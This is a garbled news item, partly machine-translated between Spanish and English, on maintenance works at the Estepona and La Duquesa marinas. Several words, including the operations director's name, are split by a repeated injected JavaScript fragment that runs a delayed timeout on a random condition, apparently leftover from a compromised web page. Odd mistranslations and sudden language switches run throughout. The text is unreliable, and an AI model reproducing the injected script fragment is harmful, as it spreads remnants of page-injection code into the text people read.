• In the Marina La Duquesa, the safety of the facilities has been improved in the face of temporary, by reinforcing the perimeter slab.
• En el Puerto Deportivo de Estepona se está trabajandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando en la instalación de placas solares para el agua caliente de las duchas, among others.
Mediterranean Marinas, which integrates the concessionaires of the marinas of Estepona and La Duquesa (Manilva), has carried out in recent months more than 200 actions to improve and maintain in the best possible conditions the facilities and services of these port enclosures. These are maintenance and prevention work included in the plans established by the Operations department of the Mediterranean Marine Group.
Among the outstanding performances carried out in this period in the Duquesa Port there is the installation of the new vehicle access system to the port site or the work of reinforcing the Varadero shilling.
As for the most significant maintenance tasks is the preventive replacement of mooring anchoring ends, the removal of wastewater from the Varadero and hazardous waste, the general review of the Travel Lift, various repairs to power and water breakdowns in trousers, conducting internal training courses for staff in electricity and masonry, as well as painting and gardening work in some areas of the port enclosure.
Within the waste management policy implemented, through the BAJUREC Program promoted by the Clean Landscape Association, new debris has been placed in the Varadero and Control Tower area and in other areas of the port; as well as the placement of new signage at the clean dots.
Other files in progress are the replacement of pantalane woods, improving gas station security facilities or deploying digitized work parts with the development of the Marinages computer tool.
As for the Puerto Deportivo de Estepona, the most significant maintenance work carried out have been the cleaning of the two lift and west sanitation wells, masonry and painting works on facades and commercial premises, the correct placement of mooring ends and mountain chains of the boats and, in your case, substitution for new. Also, gardening work has been carried out, changing cast luminaires and various repairs in pantalanes. They have also withdrawn 1.200 litres of oil by authorised manager, dentro de la política de gestión de residuos.
Y dentro de las tareas planificadas para estos meses destaca la obra para las nuevas oficinas del departamento de Administración y Sala de Juntas, la revisión y limpieza del sistema de parking, la obra de reparación del muelle en el pantalán 5 o la formación interna del personal para la utilización del software de gestión de amarres con Tablet.
As regards the ongoing files to be implementedandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando paulatinamente en este recinto portuario destacan la mejora de la red de pluviales del entorno, que acometerá la Mancomunidad de Municipios de la Costa del Sol Occidental; la instalación de placas solares para el agua caliente de las duchas o terminar de implantar el software de gestión de amarres Pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andora para gestionar las entradas de todas las embarcaciones mediante Tablet.
Todas estas actuaciones suponen un desembolso económico aproximado de 100.000€ por parte de Marinas del Mediterraneo.
Alejandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andro Suanes, Director of Operations of the Mediterranean Marines Group, ha indicado que “el cumplimiento de estos trabajos planificados, tanto de mantenimiento como de prevención que llevamos a cabo dentro de los periodos establecidos, son de vital importancia para que nuestros puertos sigan siendo un referente en la calidad de sus instalaciones y de los servicios que ofrecemos a los clientes.”